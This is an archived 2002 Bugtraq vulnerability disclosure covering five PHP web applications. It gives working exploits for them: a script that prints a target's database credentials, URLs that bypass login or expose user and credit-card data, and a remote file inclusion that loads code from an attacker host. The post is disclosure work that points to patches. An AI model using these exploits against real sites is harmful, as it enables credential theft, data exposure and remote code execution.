Multiple Web Security Holes

From: Frog Man (leseulfrogat_private)
Date: Wed Oct 02 2002 - 10:22:15 PDT

Next message: Muhammad Faisal Rauf Danka: "Postnuke XSS fixed"

Previous message: Matt Moore: "[VulnWatch] wp-02-0012: Carello 1.3 Remote File Execution (Updated 1/10/2002)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.


-----------------------------------------------------
Five products in PHP are vulnerable to various holes.

1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : BD informations disclosure
Exploit :
<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer : 
$DB_Database");
?>


2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts
Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]

Problem :
<?
if ($pymembs)
{
$login=$pymembs;
session_start();
session_register('login');
}
else { session_start(); }
[...]
if(!session_is_registered('login'))
{
?>
[...]

3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : Informations disclosure
Exploit :
http://[target]/db/users.dat

4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : Informations disclosure, Upload
Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php

5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : Include file
Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with
http://[attacker]/main_location.inc
or
http://[attacker]/config.inc.php3
or
http://[attacker]/get_userdata.php3

Problem :
if (!isset($rel_path)) $rel_path="";
include $rel_path."config.inc.php3";
include $rel_path."get_userdata.php3";



For more details & patchs :
In french :
http://www.frog-man.org/tutos/5holes10.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

-----------------------------------------------------

Sorry for my poor english.
frog-m@n



_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr

Next message: Muhammad Faisal Rauf Danka: "Postnuke XSS fixed"
Previous message: Matt Moore: "[VulnWatch] wp-02-0012: Carello 1.3 Remote File Execution (Updated 1/10/2002)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 11:53:00 PDT